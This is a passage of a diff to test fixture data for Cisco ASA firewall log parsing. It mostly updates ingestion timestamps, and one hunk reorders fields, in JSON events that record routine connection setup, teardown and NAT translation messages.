outside:192.168.98.44/8286", "code": "305011", "kind": "event", @@ -9796,7 +9796,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363845900Z", + "ingested": "2021-12-14T14:36:23.392295970Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11808 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1282 (172.31.98.44/1282)", "code": "302013", "kind": "event", @@ -9879,7 +9879,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363851500Z", + "ingested": "2021-12-14T14:36:23.392296358Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287", "code": "305011", "kind": "event", @@ -9958,7 +9958,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363855800Z", + "ingested": "2021-12-14T14:36:23.392296746Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11809 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1283 (172.31.98.44/1283)", "code": "302013", "kind": "event", @@ -10041,7 +10041,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363861100Z", + "ingested": "2021-12-14T14:36:23.392297132Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288", "code": "305011", "kind": "event", @@ -10120,7 +10120,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363865600Z", + "ingested": "2021-12-14T14:36:23.392297520Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11810 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1284 (172.31.98.44/1284)", "code": "302013", "kind": "event", @@ -10206,7 +10206,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:31:36.363869300Z", + "ingested": "2021-12-14T14:36:23.392297912Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11807 for outside:192.168.98.165/80 to inside:172.31.98.44/1281 duration 0:00:00 bytes 2028 TCP FINs", "code": "302014", "kind": "event", @@ -10291,7 +10291,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:31:36.363873700Z", + "ingested": "2021-12-14T14:36:23.392298311Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11808 for outside:192.168.98.165/80 to inside:172.31.98.44/1282 duration 0:00:00 bytes 1085 TCP FINs", "code": "302014", "kind": "event", @@ -10376,7 +10376,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:31:36.363878700Z", + "ingested": "2021-12-14T14:36:23.392298703Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11809 for outside:192.168.98.165/80 to inside:172.31.98.44/1283 duration 0:00:00 bytes 868 TCP FINs", "code": "302014", "kind": "event", @@ -10458,7 +10458,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363882900Z", + "ingested": "2021-12-14T14:36:23.392299591Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289", "code": "305011", "kind": "event", @@ -10537,7 +10537,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363887500Z", + "ingested": "2021-12-14T14:36:23.392300071Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11811 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1285 (172.31.98.44/1285)", "code": "302013", "kind": "event", @@ -10620,7 +10620,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363892300Z", + "ingested": "2021-12-14T14:36:23.392300562Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290", "code": "305011", "kind": "event", @@ -10699,7 +10699,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363896900Z", + "ingested": "2021-12-14T14:36:23.392300953Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11812 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1286 (172.31.98.44/1286)", "code": "302013", "kind": "event", @@ -10785,7 +10785,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:31:36.363901600Z", + "ingested": "2021-12-14T14:36:23.392331831Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11810 for outside:192.168.98.165/80 to inside:172.31.98.44/1284 duration 0:00:00 bytes 4439 TCP FINs", "code": "302014", "kind": "event", @@ -10867,7 +10867,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363906700Z", + "ingested": "2021-12-14T14:36:23.392332418Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291", "code": "305011", "kind": "event", @@ -10946,7 +10946,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363910500Z", + "ingested": "2021-12-14T14:36:23.392332832Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11813 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1287 (172.31.98.44/1287)", "code": "302013", "kind": "event", @@ -11032,7 +11032,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:31:36.363915300Z", + "ingested": "2021-12-14T14:36:23.392333382Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11811 for outside:192.168.98.165/80 to inside:172.31.98.44/1285 duration 0:00:00 bytes 914 TCP FINs", "code": "302014", "kind": "event", @@ -11117,7 +11117,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:31:36.363920Z", + "ingested": "2021-12-14T14:36:23.392333780Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11812 for outside:192.168.98.165/80 to inside:172.31.98.44/1286 duration 0:00:00 bytes 871 TCP FINs", "code": "302014", "kind": "event", @@ -11200,7 +11200,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363925300Z", + "ingested": "2021-12-14T14:36:23.392334162Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11814 for outside:192.168.100.107/53 (192.168.100.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -11283,7 +11283,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363929500Z", + "ingested": "2021-12-14T14:36:23.392334548Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292", "code": "305011", "kind": "event", @@ -11362,7 +11362,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363934Z", + "ingested": "2021-12-14T14:36:23.392334941Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11815 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1288 (172.31.98.44/1288)", "code": "302013", "kind": "event", @@ -11447,7 +11447,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:36.363937900Z", + "ingested": "2021-12-14T14:36:23.392335360Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11814 for outside:192.168.100.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 384", "code": "302016", "kind": "event", @@ -11530,7 +11530,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363942900Z", + "ingested": "2021-12-14T14:36:23.392335922Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11816 for outside:192.168.104.8/53 (192.168.104.8/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -11615,7 +11615,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:36.363948Z", + "ingested": "2021-12-14T14:36:23.392336314Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11816 for outside:192.168.104.8/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 94", "code": "302016", "kind": "event", @@ -11697,7 +11697,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363952200Z", + "ingested": "2021-12-14T14:36:23.392336694Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1289 to outside:192.168.98.44/8293", "code": "305011", "kind": "event", @@ -11776,7 +11776,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363957400Z", + "ingested": "2021-12-14T14:36:23.392337071Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11817 for outside:192.168.123.191/80 (192.168.123.191/80) to inside:172.31.98.44/1289 (172.31.98.44/1289)", "code": "302013", "kind": "event", @@ -11862,7 +11862,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:31:36.363963500Z", + "ingested": "2021-12-14T14:36:23.392337463Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11815 for outside:192.168.98.165/80 to inside:172.31.98.44/1288 duration 0:00:00 bytes 945 TCP FINs", "code": "302014", "kind": "event", @@ -11947,7 +11947,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:31:36.363968800Z", + "ingested": "2021-12-14T14:36:23.392337912Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11813 for outside:192.168.98.165/80 to inside:172.31.98.44/1287 duration 0:00:00 bytes 13284 TCP FINs", "code": "302014", "kind": "event", @@ -12030,7 +12030,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363973500Z", + "ingested": "2021-12-14T14:36:23.392338372Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11818 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -12115,7 +12115,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:36.363978300Z", + "ingested": "2021-12-14T14:36:23.392338762Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11818 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", @@ -12197,7 +12197,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363983900Z", + "ingested": "2021-12-14T14:36:23.392339144Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1290 to outside:192.168.98.44/8294", "code": "305011", "kind": "event", @@ -12276,7 +12276,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363987700Z", + "ingested": "2021-12-14T14:36:23.392339547Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11819 for outside:192.168.198.25/80 (192.168.198.25/80) to inside:172.31.98.44/1290 (172.31.98.44/1290)", "code": "302013", "kind": "event", @@ -12361,7 +12361,7 @@ "event": { "severity": 6, "duration": 3526000000000, - "ingested": "2021-12-09T13:31:36.363992800Z", + "ingested": "2021-12-14T14:36:23.392339941Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 9828 for outside:192.168.48.1/67 to NP Identity Ifc:255.255.255.255/68 duration 0:58:46 bytes 58512", "code": "302016", "kind": "event", @@ -12385,22 +12385,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -12410,12 +12404,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364016400Z", + "ingested": "2021-12-14T14:36:23.392340486Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1272 to outside:192.168.98.44/8276 duration 0:00:30", "code": "305012", "kind": "event", @@ -12429,7 +12426,10 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -12491,7 +12491,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364022800Z", + "ingested": "2021-12-14T14:36:23.392340873Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11820 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -12575,7 +12575,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364050600Z", + "ingested": "2021-12-14T14:36:23.392341260Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11821 for outside:192.168.162.30/53 (192.168.162.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -12660,7 +12660,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:36.364054500Z", + "ingested": "2021-12-14T14:36:23.392341649Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11820 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 168", "code": "302016", "kind": "event", @@ -12743,7 +12743,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364058800Z", + "ingested": "2021-12-14T14:36:23.392342036Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11822 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -12828,7 +12828,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:36.364063900Z", + "ingested": "2021-12-14T14:36:23.392342430Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11821 for outside:192.168.162.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 198", "code": "302016", "kind": "event", @@ -12912,7 +12912,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:36.364068200Z", + "ingested": "2021-12-14T14:36:23.392343042Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11822 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150", "code": "302016", "kind": "event", @@ -12995,7 +12995,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364073300Z", + "ingested": "2021-12-14T14:36:23.392343436Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11823 for outside:192.168.48.186/53 (192.168.48.186/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -13080,7 +13080,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:36.364078100Z", + "ingested": "2021-12-14T14:36:23.392343834Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11823 for outside:192.168.48.186/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 84", "code": "302016", "kind": "event", @@ -13162,7 +13162,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364082500Z", + "ingested": "2021-12-14T14:36:23.392344219Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1291 to outside:192.168.98.44/8295", "code": "305011", "kind": "event", @@ -13241,7 +13241,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364086600Z", + "ingested": "2021-12-14T14:36:23.392344603Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11824 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1291 (172.31.98.44/1291)", "code": "302013", "kind": "event", @@ -13325,7 +13325,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364107Z", + "ingested": "2021-12-14T14:36:23.392345309Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11825 for outside:192.168.254.94/53 (192.168.254.94/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -13410,7 +13410,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:36.364112Z", + "ingested": "2021-12-14T14:36:23.392345724Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11825 for outside:192.168.254.94/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 188", "code": "302016", "kind": "event", @@ -13492,7 +13492,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364116700Z", + "ingested": "2021-12-14T14:36:23.392346155Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1292 to outside:192.168.98.44/8296", "code": "305011", "kind": "event", @@ -13571,7 +13571,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364121100Z", + "ingested": "2021-12-14T14:36:23.392346538Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11826 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1292 (172.31.98.44/1292)", "code": "302013", "kind": "event", @@ -13654,7 +13654,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364125400Z", + "ingested": "2021-12-14T14:36:23.392347062Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297", "code": "305011", "kind": "event", @@ -13733,7 +13733,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364128900Z", + "ingested": "2021-12-14T14:36:23.392347493Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11827 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1293 (172.31.98.44/1293)", "code": "302013", "kind": "event", @@ -13816,7 +13816,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364133400Z", + "ingested": "2021-12-14T14:36:23.392347879Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298", "code": "305011", "kind": "event", @@ -13895,7 +13895,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364139400Z", + "ingested": "2021-12-14T14:36:23.392350938Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11828 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1294 (172.31.98.44/1294)", "code": "302013", "kind": "event", @@ -13981,7 +13981,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:31:36.364145300Z", + "ingested": "2021-12-14T14:36:23.392351425Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11827 for outside:192.168.98.165/80 to inside:172.31.98.44/1293 duration 0:00:00 bytes 5964 TCP FINs", "code": "302014", "kind": "event", @@ -14063,7 +14063,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364153400Z", + "ingested": "2021-12-14T14:36:23.392351832Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299", "code": "305011", "kind": "event", @@ -14142,7 +14142,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364158300Z", + "ingested": "2021-12-14T14:36:23.392352277Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11829 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1295 (172.31.98.44/1295)", "code": "302013", "kind": "event", @@ -14225,7 +14225,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364162600Z", + "ingested": "2021-12-14T14:36:23.392352660Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300", "code": "305011", "kind": "event", @@ -14304,7 +14304,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364167300Z", + "ingested": "2021-12-14T14:36:23.392353056Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11830 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1296 (172.31.98.44/1296)", "code": "302013", "kind": "event", @@ -14390,7 +14390,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:31:36.364172200Z", + "ingested": "2021-12-14T14:36:23.392353443Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11828 for outside:192.168.98.165/80 to inside:172.31.98.44/1294 duration 0:00:00 bytes 6694 TCP FINs", "code": "302014", "kind": "event", @@ -14475,7 +14475,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:31:36.364176800Z", + "ingested": "2021-12-14T14:36:23.392353834Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11829 for outside:192.168.98.165/80 to inside:172.31.98.44/1295 duration 0:00:00 bytes 1493 TCP FINs", "code": "302014", "kind": "event", @@ -14560,7 +14560,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:31:36.364181100Z", + "ingested": "2021-12-14T14:36:23.392354338Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11830 for outside:192.168.98.165/80 to inside:172.31.98.44/1296 duration 0:00:00 bytes 893 TCP FINs", "code": "302014", "kind": "event", @@ -14642,7 +14642,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364185300Z", + "ingested": "2021-12-14T14:36:23.392354819Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301", "code": "305011", "kind": "event", @@ -14721,7 +14721,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364189900Z", + "ingested": "2021-12-14T14:36:23.392355201Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11831 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1297 (172.31.98.44/1297)", "code": "302013", "kind": "event", @@ -14804,7 +14804,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364193600Z", + "ingested": "2021-12-14T14:36:23.392355589Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302", "code": "305011", "kind": "event", @@ -14883,7 +14883,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364197700Z", + "ingested": "2021-12-14T14:36:23.392355970Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11832 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1298 (172.31.98.44/1298)", "code": "302013", "kind": "event", @@ -14967,7 +14967,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364201600Z", + "ingested": "2021-12-14T14:36:23.392356356Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11833 for outside:192.168.179.9/53 (192.168.179.9/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -15052,7 +15052,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:36.364206200Z", + "ingested": "2021-12-14T14:36:23.392356915Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11833 for outside:192.168.179.9/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150", "code": "302016", "kind": "event", @@ -15137,7 +15137,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:31:36.364210200Z", + "ingested": "2021-12-14T14:36:23.392357359Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11831 for outside:192.168.98.165/80 to inside:172.31.98.44/1297 duration 0:00:00 bytes 2750 TCP FINs", "code": "302014", "kind": "event", @@ -15219,7 +15219,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364215100Z", + "ingested": "2021-12-14T14:36:23.392357732Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303", "code": "305011", "kind": "event", @@ -15298,7 +15298,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364219200Z", + "ingested": "2021-12-14T14:36:23.392358108Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11834 for outside:192.168.247.99/80 (192.168.247.99/80) to inside:172.31.98.44/1299 (172.31.98.44/1299)", "code": "302013", "kind": "event", @@ -15381,7 +15381,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364222800Z", + "ingested": "2021-12-14T14:36:23.392358506Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304", "code": "305011", "kind": "event", @@ -15460,7 +15460,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364226600Z", + "ingested": "2021-12-14T14:36:23.392358890Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11835 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1300 (172.31.98.44/1300)", "code": "302013", "kind": "event", @@ -15546,7 +15546,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:31:36.364230800Z", + "ingested": "2021-12-14T14:36:23.392359300Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11832 for outside:192.168.98.165/80 to inside:172.31.98.44/1298 duration 0:00:00 bytes 881 TCP FINs", "code": "302014", "kind": "event", @@ -15631,7 +15631,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:31:36.364257Z", + "ingested": "2021-12-14T14:36:23.392359681Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11835 for outside:192.168.98.165/80 to inside:172.31.98.44/1300 duration 0:00:00 bytes 2202 TCP FINs", "code": "302014", "kind": "event", @@ -15713,7 +15713,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364262300Z", + "ingested": "2021-12-14T14:36:23.392360081Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305", "code": "305011", "kind": "event", @@ -15792,7 +15792,7 @@ }, "event": { 